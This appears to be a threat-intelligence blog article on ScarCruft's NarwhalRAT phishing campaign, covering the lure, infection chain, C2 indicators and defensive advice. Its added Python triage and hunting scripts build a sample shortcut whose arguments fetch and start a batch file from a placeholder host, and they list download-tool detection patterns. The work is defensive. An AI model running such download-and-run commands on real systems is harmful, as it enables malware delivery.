
ScarCruft NarwhalRAT Targets Microsoft Account Users


You receive an email. It looks like it is from Microsoft. It warns about suspicious activity on your Microsoft Account. Someone is generating one-time passwords repeatedly. It might be a phishing attempt. Change your password now. Refer to the attached advisory.

You open the attachment. It is not a document. It is a ZIP file containing a shortcut. You click it.

Congratulations. You just invited ScarCruft into your system.

The North Korean state-sponsored hacking group, also known as APT37, has been using this exact lure to deliver a new Python-based remote access tool called NarwhalRAT. The ScarCruft NarwhalRAT malware campaign targets users who would never fall for a poorly written phishing email, but might panic at the thought of their Microsoft account being compromised.

The Spear-Phishing Lure


Researchers at Genians Security Center, who analysed the campaign, described the lure in detail. It was an email purporting to come from Microsoft, warning the recipient that their account had run into problems because of repeated OTP (One-Time Password) requests.

The email was designed to induce a feeling of urgency in users and to cause concern about whether their account may have been compromised.

The email then directed the reader to an attached advisory document. The attachment was not the HWP document the message implied; it was a ZIP archive containing a malicious LNK (Windows shortcut) file.

The psychological pressure applied by the lure works in four steps:
1. Fear of having already been the victim of an account compromise
2. Urgency to act immediately
3. Trust in a message that appears to come from "Microsoft"
4. Confidence that following the advisory, by opening the attachment, is the safe thing to do

The victim therefore never knowingly chose to install malware. They acted on what they believed was legitimate security advice.

How the Infection Chain Works

The NarwhalRAT infection chain is a multi-stage process designed to evade detection and leave little forensic evidence behind.

Stage 1: The LNK file is the initial entry point. When the user double-clicks it, it runs a chain of intermediate batch scripts that download further components from remote servers.

Stage 2: Next, the chain fetches a legitimate Python interpreter from Python's official website. Abusing legitimate, signed executables is a common evasion technique: the interpreter itself is clean, so signature and file-reputation checks pass, and only the script it is later given is malicious.

Stage 3: The third download is a file with a .cat extension, presented as a Windows security catalog. A real catalog is just a signed list of file hashes and cannot execute anything by itself, so the extension is camouflage: this is the file the persistence mechanism hands to the downloaded Python interpreter to get the payload running in memory.

Stage 4: Finally, the chain creates a scheduled task named MicrosoftUserInterfacePicturesUpdateTackMachine. The task launches the CAT file, which loads the main NarwhalRAT payload entirely in memory. What remains on disk is a legitimate Python interpreter and a file with an innocuous extension; the RAT itself is never written out as a recognisable executable, which is why file-based antivirus has so little to work with.
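As an added example (not code from the Genians report or from this article), here is a small Python triage script for the Stage 1 artefact. A Windows shortcut stores its real command line in the string fields of the MS-SHLLINK format, so the script parses those fields and flags the usual tells (script hosts, download utilities, URLs, dropped scripts). The LNK bytes are constructed inline by a helper; the relative path, arguments and the example.invalid URL are placeholders, not indicators from this campaign.

```python
import re
import struct

# MS-SHLLINK header: fixed 76-byte size and the Shell Link CLSID.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits that govern which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields appear in exactly this order when their flag is set.
STRING_FIELDS = [
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
]

# Patterns a shortcut lure's command line commonly contains (order = report order).
SUSPICIOUS = [
    (r"\b(cmd|powershell|pwsh|wscript|cscript|mshta|rundll32)(\.exe)?\b", "script/LOLBin host"),
    (r"\b(curl|certutil|bitsadmin|wget)\b", "download utility"),
    (r"https?://", "embedded URL"),
    (r"\.(bat|cmd|vbs|ps1)\b", "dropped script"),
    (r"(^|\s)(-|/)(w|windowstyle)\s+hidden", "hidden window"),
]


def _read_string(data, offset, unicode):
    """Read one StringData field: 2-byte character count, then the characters."""
    count = struct.unpack_from("<H", data, offset)[0]
    offset += 2
    if unicode:
        raw = data[offset:offset + count * 2]
        return raw.decode("utf-16-le"), offset + count * 2
    # Non-Unicode strings use the system code page; latin-1 is a stand-in here.
    raw = data[offset:offset + count]
    return raw.decode("latin-1"), offset + count


def parse_lnk(data):
    """Return the StringData fields of a shell link as a dict."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("not a shell link: bad header size")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad CLSID")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    offset = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip IDList (2-byte size + items)
        offset += 2 + struct.unpack_from("<H", data, offset)[0]
    if flags & HAS_LINK_INFO:                    # skip LinkInfo (4-byte size includes itself)
        offset += struct.unpack_from("<I", data, offset)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for bit, name in STRING_FIELDS:
        if flags & bit:
            fields[name], offset = _read_string(data, offset, unicode)
    return fields


def triage_lnk(data):
    """Parse a shortcut and return (fields, list of suspicious-indicator labels)."""
    fields = parse_lnk(data)
    text = " ".join(fields.values())
    hits = [label for pattern, label in SUSPICIOUS if re.search(pattern, text, re.IGNORECASE)]
    return fields, hits


def build_sample_lnk(relative_path, arguments, icon_location):
    """Construct a minimal Unicode shell link carrying only the three string fields (test data)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))   # attributes, timestamps, etc. zeroed

    def field(value):
        return struct.pack("<H", len(value)) + value.encode("utf-16-le")

    return header + field(relative_path) + field(arguments) + field(icon_location)


# Constructed samples: a lure-style shortcut and a benign one. Placeholder values only.
SAMPLE_LNK = build_sample_lnk(
    "..\\..\\..\\Windows\\System32\\cmd.exe",
    '/c curl -s -o "%TEMP%\\s.bat" http://example.invalid/stage1.bat && start /min "%TEMP%\\s.bat"',
    "%SystemRoot%\\System32\\shell32.dll",
)
BENIGN_LNK = build_sample_lnk(
    "..\\..\\..\\Windows\\System32\\notepad.exe", "", "%SystemRoot%\\System32\\notepad.exe"
)

if __name__ == "__main__":
    for label, blob in (("lure", SAMPLE_LNK), ("benign", BENIGN_LNK)):
        fields, hits = triage_lnk(blob)
        print(label, fields.get("relative_path"), fields.get("arguments"), hits)
```

Run it on a real attachment with `triage_lnk(open(path, "rb").read())`. The parser skips the LinkTargetIDList and LinkInfo structures rather than interpreting them, because for a phishing LNK the relative path and arguments are what reveal the downloader; a lure that targets cmd.exe or powershell.exe while wearing a document icon is the combination to look for.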

How NarwhalRAT Works

NarwhalRAT, written in Python, carries a broad set of information-stealing capabilities:

1. Keylogging: it records every keystroke.
2. Screen capture: it takes screenshots of the desktop.
3. Audio capture: it records sound in the room through the computer's microphone.
4. File collection: it uploads files from the host, including files on connected external drives, to the attacker.
5. Window tracking: it records which windows are open at any given time.
6. Removable-media collection: it harvests data from USB drives and similar devices.
7. Remote command execution: it runs whatever commands the Command and Control server sends.
8. C2 switching: it can move to a different Command and Control server as needed.

ScarCruft also hides its loot in plain sight: stolen data is staged in a hidden folder named Naver Whale (a legitimate web browser made by the South Korean company Naver Corporation), so the directory looks like ordinary browser data rather than an exfiltration cache.

The Command and Control Infrastructure

ScarCruft employs a complex, multilayered Command and Control (C2) infrastructure that provides resilience against C2 takedown.

Primary C2 Channels

ScarCruft employs Korean websites as its primary communication channels.
1. daehoat[.]com
2. novel21[.]co.kr

Secondary C2 Channels - Dead Drop Resolver

ScarCruft also uses the pCloud cloud-storage API as a dead drop resolver: the implant requests a pCloud folder, identified by the folderid and auth parameters of the API call, and reads its current C2 location from there. Traffic to a well-known cloud storage service is rarely blocked at the perimeter, which makes this a resilient fallback channel if the primary servers are taken down.

NarwhalRAT vs. RokRAT

This campaign marks a departure from ScarCruft's long-standing reliance on RokRAT. NarwhalRAT is a different family, built in Python rather than compiled C++. The shift suggests the group is evolving its toolset.

Genians noted that the ScarCruft NarwhalRAT malware campaign shares "multiple similarities" with prior Python-based attacks by APT37. The group has used similar LNK-driven infection chains with ticket confirmations and event invitations as lures.

The scheduled task naming convention also follows a pattern. While NarwhalRAT uses MicrosoftUserInterfacePicturesUpdateTackMachine, a previous campaign used MicrosoftMusicLibrariesPackageTaskMachine. The similarity suggests the same developers or a shared playbook.

Who is ScarCruft?

ScarCruft is a North Korean state-sponsored hacking group and is tracked as APT37. The group has been targeting various sectors of the South Korean government and military, as well as diplomatic organizations, media outlets, human rights activists and think tanks/academics for several years.

The group is known to be capable of highly sophisticated spear phishing tactics. One of the most advanced methods used by this group is to use highly relatable or timely themes when creating their spear-phishing emails. 

The Microsoft Account security alert is a new lure for the group, but it is consistent with its established habit of borrowing trusted brands and timely topics.

How to Protect Yourself

The ScarCruft NarwhalRAT malware campaign relies on user interaction. That means your behavior is the best defense.

For individuals:

1. Never open attachments from unsolicited emails, even if they appear to come from Microsoft.
2. If you get a security alert by email, do not click on any links or attachments in the email itself; instead, go directly to the website of the organisation concerned to see what your current account status is.
3. You should also be mindful of how "urgent" the email sounds because scams can encourage you into responding quickly and encourage you not to think about your actions before acting.
4. Look at the sender's address closely. Genuine Microsoft security alerts come from Microsoft-owned domains, not from generic Gmail or Outlook accounts. Bear in mind that the display name is trivially spoofed, so check the actual address, and if in doubt verify through account.microsoft.com rather than the email.

For organizations:

1. Train your users on brand-impersonation attacks so they recognise the pattern of a "security alert" that arrives with an attachment.
2. Block LNK files at the email gateway where possible, including inside ZIP archives; an LNK inside an archive is the first step of this chain.
3. Alert on scheduled-task creation (Windows Security event 4698, or Sysmon) where the task name matches MicrosoftUserInterfacePicturesUpdateTackMachine or the earlier MicrosoftMusicLibrariesPackageTaskMachine, and more generally on tasks created under a user profile whose action is a Python interpreter.
4. Monitor outbound traffic for the reported C2 domains (daehoat[.]com and novel21[.]co.kr) and, more broadly, for unusual connections to Korean hosts your organisation does not normally interact with.
5. Inspect proxy logs for pCloud API requests leaving your network that carry both the folderid and auth parameters. Legitimate pCloud use exists, so triage by host and originating process, but an endpoint that has never used pCloud before is a strong signal.
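To make the organisational checks concrete (the scheduled-task names, the two C2 domains, and the folderid/auth pattern from the dead drop resolver section above), here is an added Python hunting example; it is not code from the article or from the Genians report. Task-creation events are represented as already-parsed dicts of the fields a Security 4698 record carries, and the proxy lines use a made-up "timestamp src_ip METHOD url status" layout; all of the telemetry is constructed. The "Python interpreter from a user profile launched against a .cat file" heuristic and the match on pcloud.com hosts are my assumptions, not findings from the report.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Task names from the report. The suffix is spelled both "TackMachine" and
# "TaskMachine" in reporting, so the regex accepts either.
TASK_NAME_RE = re.compile(
    r"^\\?Microsoft(UserInterfacePicturesUpdate|MusicLibrariesPackage)Ta[cs]kMachine$",
    re.IGNORECASE,
)

# Primary C2 domains named in the report (defanged in the article text).
C2_DOMAINS = {"daehoat.com", "novel21.co.kr"}

# Assumption: pCloud API traffic is served from hosts under pcloud.com.
PCLOUD_SUFFIX = "pcloud.com"


def check_task_event(ev):
    """ev: fields of a Security 4698 (task created) event as a dict. Returns reasons."""
    reasons = []
    name = ev.get("TaskName", "")
    if TASK_NAME_RE.match(name):
        reasons.append(f"task name matches APT37 pattern: {name}")
    cmd = ev.get("Command", "").lower()
    args = ev.get("Arguments", "").lower()
    # Heuristic (assumption): a Python interpreter living in a user-writable path,
    # handed a .cat file, mirrors the Stage 2 + Stage 3 artefacts described above.
    if "python" in cmd and ("\\appdata\\" in cmd or "\\users\\" in cmd) and args.endswith(".cat"):
        reasons.append("python interpreter from user profile launched against a .cat file")
    return reasons


def check_proxy_line(line):
    """line: 'timestamp src_ip METHOD url status' (constructed layout). Returns reasons."""
    parts = line.split()
    if len(parts) < 4:
        return []
    u = urlsplit(parts[3])
    host = (u.hostname or "").lower()
    reasons = []
    if host in C2_DOMAINS or any(host.endswith("." + d) for d in C2_DOMAINS):
        reasons.append(f"connection to reported C2 domain {host}")
    if host == PCLOUD_SUFFIX or host.endswith("." + PCLOUD_SUFFIX):
        q = parse_qs(u.query)
        # Only folderid together with auth is the dead-drop lookup shape; a bare
        # auth-only call (e.g. userinfo) is ordinary client behaviour.
        if "folderid" in q and "auth" in q:
            reasons.append("pCloud API call carrying folderid and auth (dead-drop resolver pattern)")
    return reasons


def hunt(task_events, proxy_lines):
    """Run both checks and return (source, where, reason) tuples."""
    alerts = []
    for ev in task_events:
        for reason in check_task_event(ev):
            alerts.append(("task", ev.get("Computer", "?"), reason))
    for line in proxy_lines:
        for reason in check_proxy_line(line):
            alerts.append(("proxy", line.split()[1], reason))
    return alerts


# Constructed sample telemetry (not real events); paths and IPs are placeholders.
SAMPLE_TASK_EVENTS = [
    {"Computer": "WS-17", "SubjectUserName": "alice",
     "TaskName": "\\MicrosoftUserInterfacePicturesUpdateTackMachine",
     "Command": "C:\\Users\\alice\\AppData\\Local\\Programs\\Python\\pythonw.exe",
     "Arguments": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\update.cat"},
    {"Computer": "WS-22", "SubjectUserName": "SYSTEM",
     "TaskName": "\\GoogleUpdateTaskMachineUA",
     "Command": "C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe",
     "Arguments": "/ua /installsource scheduler"},
]

SAMPLE_PROXY_LINES = [
    "2026-01-15T09:02:11Z 10.0.4.17 GET https://api.pcloud.com/listfolder?folderid=123456789&auth=AbCdEf 200",
    "2026-01-15T09:02:40Z 10.0.4.17 GET https://daehoat.com/ 200",
    "2026-01-15T09:03:05Z 10.0.4.22 GET https://www.microsoft.com/en-us/security 200",
    "2026-01-15T09:03:30Z 10.0.4.22 GET https://api.pcloud.com/userinfo?auth=AbCdEf 200",
]

if __name__ == "__main__":
    for source, where, reason in hunt(SAMPLE_TASK_EVENTS, SAMPLE_PROXY_LINES):
        print(f"[{source}] {where}: {reason}")
```

On the sample data the first task event fires twice (name and heuristic), the Google updater does not, and only the pCloud listfolder call and the daehoat[.]com request are raised from the proxy lines; the auth-only pCloud call is deliberately left alone so that ordinary desktop-client traffic does not flood the queue. In production, feed check_task_event from your SIEM's parsed 4698 or Sysmon events and tune the C2_DOMAINS set as the report's indicators are updated.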

The ScarCruft NarwhalRAT malware campaign illustrates how threat actors keep evolving to evade detection. The tradecraft has moved from the compiled RokRAT to a Python-based implant, with in-memory execution and cloud-backed C2 fallback for resilience.

FAQ Section

What is NarwhalRAT?

NarwhalRAT is a remote access trojan (RAT), written in Python, attributed to the North Korean state-sponsored group ScarCruft (APT37). Its capabilities include keylogging, screen capture, audio recording, uploading files to the command and control server, and switching between command and control channels.

How does the NarwhalRAT malware campaign initiated from ScarCruft work?

The target receives a spear-phishing email impersonating a Microsoft Account security alert, which instructs them to open the attached advisory. The attachment is a ZIP file containing an LNK (shortcut) file.

What happens once the LNK file is executed by the recipient?

Executing the LNK file starts a multi-stage chain that downloads a legitimate Python binary, a file with a .cat extension, and the NarwhalRAT payload. Persistence is established through a scheduled task, and the payload itself runs in memory.

How does NarwhalRAT communicate with its command and control server?

NarwhalRAT uses Korean websites (daehoat[.]com and novel21[.]co.kr) as its primary command and control servers, with the pCloud cloud storage API serving as a secondary channel: a dead drop resolver from which the implant retrieves its fallback C2 location.

Is this related to RokRAT?

NarwhalRAT is a separate malware family. ScarCruft had long relied on RokRAT, and this campaign marks a departure from that pattern.

How can I avoid falling victim?

Never open attachments from unsolicited emails. Verify security alerts by going directly to the official website. Be suspicious of urgent language. Block LNK files in email when possible.

Source: The Hacker News

© 2016 – 2026 Red Secure Tech Ltd. Registered in England and Wales — Company No: 15581067